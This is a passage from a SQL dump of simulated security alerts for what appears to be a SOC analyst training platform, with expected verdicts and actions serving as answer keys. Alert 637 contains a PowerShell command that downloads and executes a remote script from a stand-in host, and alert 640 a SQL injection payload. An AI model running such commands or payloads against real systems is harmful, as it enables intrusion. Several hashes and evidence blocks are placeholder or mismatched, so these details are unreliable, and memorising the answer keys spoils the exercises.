(635, 'Outbound Connection to Known Malicious IP', 'high', 'Firewall', 'An outbound connection was detected to an IP address with known malicious activities.', 'Data Exfiltration', 'T1041', 1, 'investigating', 74, '{\"timestamp\":\"2026-01-11T19:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.21\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"CORP-WORKSTATION5\"}', '2026-01-11 11:18:33', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"monitor_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for data exfiltration, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(636, 'Malware Detected via IPS Signature', 'critical', 'IDS/IPS', 'A known malware signature was detected in network traffic.', 'Malware', 'T1105', 1, 'Closed', 65, '{\"timestamp\":\"2026-01-11T20:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.22\",\"dst_ip\":\"192.168.1.5\",\"hostname\":\"CORP-WORKSTATION6\",\"file_hash\":\"efgh5678abcd1234ijkl9012mnopqrst\"}', '2026-01-11 00:34:12', '2026-02-05 17:01:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"efgh5678abcd1234ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 70 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.278Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T20:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.22\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION6\\\",\\\"file_hash\\\":\\\"efgh5678abcd1234ijkl9012mnopqrst\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(637, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious process was executed on host WIN-1234ABCD using PowerShell. The command appears to be attempting to download a file from a suspicious external IP.', 'Malware', 'T1059', 1, 'Closed', 126, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jdoe\",\"hostname\":\"WIN-1234ABCD\",\"command_line\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 00:07:42', '2026-02-19 20:43:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download and execute a malicious script\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution clearly shows intent to download and execute a malicious script from a known bad IP.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(638, 'Brute Force Attack Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from an external IP on the corporate VPN service, suggesting a brute force attack.', 'Brute Force', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unknown\",\"hostname\":\"VPN-SERVER\",\"failed_attempts\":25}', '2026-01-11 08:27:41', '2026-02-22 14:43:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 450 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from the same external IP indicates a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.280Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(639, 'Phishing Email Detected', 'high', 'Proofpoint', 'A phishing email was received by user jsmith containing a suspicious link purportedly leading to a document download.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.15\",\"username\":\"jsmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"no-reply@notarealcompany.com\",\"url\":\"http://malicious-link.com/download\"}', '2026-01-11 11:57:34', '2026-02-02 12:11:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@notarealcompany.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain not recognized as legitimate business.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known to host phishing content\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in phishing campaigns\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known malicious URL used in phishing attacks.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.282Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(640, 'SQL Injection Attempt Detected', 'critical', 'Web Application Firewall', 'An SQL injection attempt was detected targeting the login page of the corporate web application.', 'Web Attack', 'T1190', 1, 'Closed', 99, '{\"timestamp\":\"2026-01-11T11:20:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.1.20\",\"username\":\"n/a\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 09:57:55', '2026-02-16 17:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 600 times for SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request payload is a classic SQL injection technique.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(641, 'Unauthorized Access Attempt on Admin Account', 'high', 'Wazuh', 'Multiple failed login attempts were detected on an admin account from a foreign IP address. This might indicate an attempt to gain unauthorized access.', 'Brute Force', 'T1078', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"DC-SERVER\",\"failed_attempts\":30}', '2026-01-10 05:59:33', '2026-03-09 02:34:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of failed attempts suggests a brute force attack targeting admin credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:31:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:30:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:29:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:28:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(642, 'Suspicious Network Connection to Known C2 Server', 'critical', 'Firewall', 'A suspicious outbound network connection was detected from an internal host to a known command and control server.', 'Malware', 'T1105', 1, 'investigating', 74, '{\"timestamp\":\"2026-01-11T12:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"203.0.113.99\",\"username\":\"svc_account\",\"hostname\":\"INFECTED-PC\"}', '2026-01-10 18:01:00', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP recognized as a command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The destination IP is known for C2 activity, confirming the presence of malware on the host.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(643, 'False Positive: User Access from Known Location', 'low', 'Splunk', 'A login attempt was flagged as suspicious due to an unexpected geographic location, but further analysis indicates it is a legitimate access from a known user.', 'Brute Force', 'T1078', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T13:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.15\",\"username\":\"mike\",\"hostname\":\"VPN-SERVER\"}', '2026-01-10 04:02:31', '2026-03-09 02:47:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with legitimate user access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mike\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User verified as legitimate employee with known travel history.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was from a known user and location, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(644, 'Unauthorized Remote Access Tool Detected', 'high', 'EDR', 'An unauthorized remote access tool was detected running on a corporate workstation, indicating potential compromised access.', 'Malware', 'T1219', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"203.0.113.88\",\"username\":\"lisa\",\"hostname\":\"WORK-PC-01\",\"command_line\":\"C:\\\\Program Files\\\\RAT\\\\rat.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 11:34:49', '2026-02-18 13:55:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a remote access 